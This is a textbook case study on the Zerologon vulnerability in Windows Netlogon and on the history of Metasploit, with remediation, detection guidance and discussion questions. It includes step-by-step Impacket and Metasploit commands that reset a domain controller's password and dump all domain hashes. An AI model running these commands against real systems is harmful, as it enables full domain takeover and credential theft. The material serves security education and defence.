Case Study 12.2: Zerologon (CVE-2020-1472) and the Origin Story of Metasploit

Part A: Zerologon — A Cryptographic Catastrophe

Overview

On September 11, 2020, researcher Tom Tervoort of Secura published technical details of CVE-2020-1472, a vulnerability he named "Zerologon." The flaw, rated CVSS 10.0 (the maximum severity score), allowed any attacker with network access to a domain controller to completely compromise the entire Active Directory domain in approximately three seconds. No credentials were required. No user interaction was needed. The vulnerability existed in the Netlogon Remote Protocol (MS-NRPC), a core authentication protocol used by every Windows domain controller.

Microsoft had released a patch in August 2020, but the severity of the vulnerability and the ease of exploitation made Zerologon one of the most dangerous Active Directory vulnerabilities ever discovered. Within days of the technical publication, working exploits appeared, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive requiring all federal agencies to patch within three days.

The Vulnerability

The Netlogon Remote Protocol uses a custom cryptographic authentication scheme called the ComputeNetlogonCredential function. This function uses AES-CFB8 (AES in Cipher Feedback mode with 8-bit feedback) to encrypt a challenge value, producing a credential used to authenticate the client to the server.

The critical flaw was in how AES-CFB8 was initialized. The initialization vector (IV) was always set to 16 zero bytes. In AES-CFB8, if the IV is all zeros and the plaintext happens to start with zero bytes, there is a 1-in-256 chance that the ciphertext will also be all zeros. By extension, if both the client challenge and the client credential are set to all zeros, there is a 1-in-256 probability that the server will accept the authentication.

An attacker simply needed to attempt authentication with all-zero values approximately 256 times. At network speed, this took about three seconds. Once authenticated, the attacker could:

Set the domain controller's machine account password to empty — This effectively gave the attacker the domain controller's credentials.
Use DCSync to replicate all domain password hashes — Including the krbtgt hash, which allows Golden Ticket attacks.
Achieve complete domain compromise — Every user, every system, every service account.

The Exploit Chain

The attack sequence demonstrates the devastating efficiency of Zerologon:

Step 1: Attacker sends Netlogon authentication with all-zero credentials
        → Repeats up to 256 times (takes ~3 seconds)
        → Server eventually accepts due to the crypto flaw

Step 2: Attacker sets the DC machine account password to an empty value
        → Uses NetrServerPasswordSet2 with all-zero ciphertext
        → DC's password in AD is now empty

Step 3: Attacker uses the empty password for DCSync
        → Replicates all password hashes from the domain
        → Extracts Administrator NTLM hash, krbtgt hash, etc.

Step 4: Attacker uses extracted hashes for pass-the-hash
        → Full domain admin access achieved
        → Total time: under 10 seconds

Using Impacket's zerologon exploit:

# Test for vulnerability
python3 zerologon_tester.py DC01 10.10.10.50

# Exploit (sets DC machine password to empty)
python3 cve-2020-1472-exploit.py DC01 10.10.10.50

# DCSync to extract all hashes
secretsdump.py -just-dc -no-pass 'MEDSECURE/DC01$@10.10.10.50'

# Restore the DC machine password (CRITICAL - must be done after testing)
python3 restorepassword.py MEDSECURE/DC01@DC01 -target-ip 10.10.10.50 \
  -hexpass <original_hash>

In Metasploit:

msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 10.10.10.50
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME DC01
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run

Impact on MedSecure Scenario

In the MedSecure penetration test, if the domain controller is vulnerable to Zerologon, the implications are catastrophic:

The attacker gains access to every user account, including all clinical staff
Every service account credential is exposed, including those for the EHR database
Patient records, billing data, and administrative systems are fully accessible
The attacker can create persistent domain admin access that survives password resets
Active Directory trust relationships with partner organizations may also be compromised

This finding would be rated Critical in any penetration test report, with immediate remediation required.

⚖️ Legal Note: When exploiting Zerologon in authorized testing, you MUST restore the domain controller's machine account password immediately after demonstrating the vulnerability. Setting the password to empty disrupts all domain authentication and will cause immediate, severe operational impact. This exploit should ideally be tested in a non-production environment or during a scheduled maintenance window with the client's domain administrator present.

Remediation

Microsoft's remediation came in two phases:

August 2020 patch — Updated the Netlogon protocol to require secure RPC, but initially in compatibility mode to avoid breaking legacy systems.
February 2021 enforcement — Full enforcement mode, requiring all Netlogon connections to use secure RPC. Legacy systems that could not support secure RPC would be unable to authenticate.

For organizations like MedSecure: - Apply the patch immediately - Enable full enforcement mode - Monitor for Netlogon authentication events (Event ID 5829) from non-compliant devices - Identify and update or replace legacy systems that cannot use secure RPC

Defensive Detection

🔵 Blue Team Perspective: Detect Zerologon exploitation by monitoring: - Windows Event ID 4742 — Computer account changed (the machine password reset) - Windows Event ID 5829 — Netlogon allowed a vulnerable Netlogon secure channel connection - Multiple Netlogon authentication failures followed by a success in rapid succession - DCSync traffic — DS-Replication-Get-Changes operations from non-domain-controller IPs - Network traffic analysis showing many Netlogon RPC calls with zero-byte payloads

Part B: The Origin Story of Metasploit — HD Moore's Revolution

The Problem Before Metasploit

Before 2003, the exploit landscape was chaotic. Security researchers published exploits as standalone scripts—typically in C, Perl, or Python—each with its own command-line interface, dependencies, and quirks. A penetration tester might need dozens of different tools, each requiring specific compilation environments, library versions, and configuration.

Common problems included: - No standardization — Every exploit had a different interface and different options - Payload coupling — Most exploits had their payloads hardcoded; changing the payload meant modifying source code - Limited platform support — An exploit written for Linux often would not compile on other platforms - No modularity — If you wanted to combine an exploit with a different payload, you had to write custom integration code - Poor documentation — Many public exploits were poorly documented, unreliable, or intentionally backdoored

HD Moore's Vision

H.D. Moore was a security researcher who had spent years navigating this fragmented ecosystem. In 2003, at age 22, he released the first version of the Metasploit Framework with a radical premise: create a modular platform where exploits and payloads were separate, interchangeable components.

The first version, written in Perl, included just 11 exploits and a handful of payloads. But its architecture was revolutionary: - Modularity — Exploits and payloads were separate modules that could be mixed and matched - Standardized interface — All modules used the same option-setting conventions - Payload generation — Payloads were generated dynamically, allowing customization - Open source — The framework was freely available, encouraging community contribution

Moore's original announcement on the Bugtraq mailing list was understated, but the security community immediately recognized the significance.

Evolution and Growth

Metasploit 2.x (2004) — Gained significant traction. The modular architecture attracted contributors who began adding new exploits at an accelerating pace. The framework grew from 11 to over 100 exploits.

Metasploit 3.0 (2007) — A complete rewrite in Ruby. Moore chose Ruby for its metaprogramming capabilities, object-oriented design, and cross-platform support. This rewrite established the architecture that persists today: - The Rex (Ruby Extension) library for networking - The Core library for module management - The Base library for simplified interfaces - The concept of mixins for shared functionality

Meterpreter was also introduced in this era, providing an advanced, in-memory, extensible payload that became the framework's signature capability.

Rapid7 Acquisition (2009) — Rapid7, a security analytics company, acquired the Metasploit Project and hired Moore as Chief Security Officer. This provided dedicated funding and development resources while keeping the framework open source. Rapid7 built commercial products (Metasploit Pro, Metasploit Express) on top of the open-source core, following the successful open-core business model.

Post-Acquisition Growth (2009-Present): - Module count grew from hundreds to thousands - Community contribution process formalized (GitHub pull requests) - Integration with Rapid7's vulnerability scanning products - Addition of new module types (Evasion, introduced in Metasploit 5.0) - REST API for programmatic access - Modernized database schema and workspace management

HD Moore's Impact

Moore's contribution to security extends far beyond Metasploit: - Critical.io / Project Sonar — Large-scale internet scanning projects that mapped the global attack surface - Rapid7 Labs — Research that identified systemic vulnerabilities in embedded systems, IoT devices, and SCADA systems - Security philosophy — Moore championed the idea that security tools should be freely available to defenders, arguing that attackers already had these capabilities

Moore's philosophy was succinctly expressed in his frequently quoted statement: "The goal of Metasploit is to provide useful information to people who perform penetration testing, IDS signature development, and exploit research."

Metasploit's Impact on the Industry

The Metasploit Framework fundamentally changed information security in several ways:

1. Democratization of Security Testing Before Metasploit, exploitation skills were concentrated among a small elite. Metasploit made sophisticated exploitation accessible to a much broader community, enabling: - Organizations to test their own defenses - Security consultants to conduct more comprehensive assessments - Students to learn exploitation in structured, safe environments - Defenders to understand attacker capabilities

2. Accelerated Patch Adoption When a new vulnerability is disclosed, a Metasploit module often follows within days. This creates urgency for patching—organizations can no longer assume that exploitation requires elite skills. The Zerologon Metasploit module, for example, made it trivially easy to demonstrate the vulnerability, motivating rapid patching.

3. Professionalization of Penetration Testing Metasploit provided a standardized platform that enabled consistent, repeatable testing. This professionalized the penetration testing industry and contributed to the development of certifications (OSCP, GPEN) that assess practical exploitation skills.

4. Informed Defensive Development Understanding how Metasploit modules work helps defenders build better detections. Many IDS/IPS signatures are developed by analyzing Metasploit modules. Endpoint detection rules often specifically target Meterpreter behaviors.

Ethical Debates

Metasploit's existence has always been controversial:

Critics argue: - It lowers the barrier for malicious hacking - Script kiddies can use it without understanding the underlying vulnerabilities - Automated exploitation tools make attacks faster and more scalable

Supporters counter: - Attackers already have these capabilities; tools like Metasploit ensure defenders can match them - Open-source tools are auditable and trustworthy, unlike underground tools that may be backdoored - Education requires accessible tools - The alternative—security through obscurity—has never worked

The consensus in the professional security community strongly favors Metasploit's existence. The framework is integral to defensive security, education, and the responsible disclosure ecosystem.

Discussion Questions

Zerologon was patched a month before the technical details were published. Why did many organizations remain vulnerable? What does this tell us about the gap between patch availability and patch adoption?
The Zerologon vulnerability stems from a flawed use of AES-CFB8 with a zero IV. This was a specification flaw, not an implementation bug. What are the implications of cryptographic design flaws in core authentication protocols?
HD Moore was 22 when he created Metasploit. What does the history of Metasploit tell us about the role of individual innovators in security?
Should exploit frameworks like Metasploit remain freely available, or should access be restricted to certified professionals? What would be the consequences of either policy?
If you discovered a vulnerability as severe as Zerologon in the MedSecure domain controller during a penetration test, how would you handle the situation? Consider: immediate notification, proof-of-concept depth, and cleanup requirements.

References

Secura. (2020). "Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)."
CISA. (2020). "Emergency Directive 20-04: Mitigate Netlogon Elevation of Privilege Vulnerability."
Microsoft. (2020). "How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472."
Moore, H.D. (2003). "The Metasploit Project." Bugtraq mailing list announcement.
Kennedy, D., O'Gorman, J., Kearns, D., & Aharoni, M. (2011). Metasploit: The Penetration Tester's Guide. No Starch Press.
Rapid7. (2025). "Metasploit Framework Documentation." docs.metasploit.com.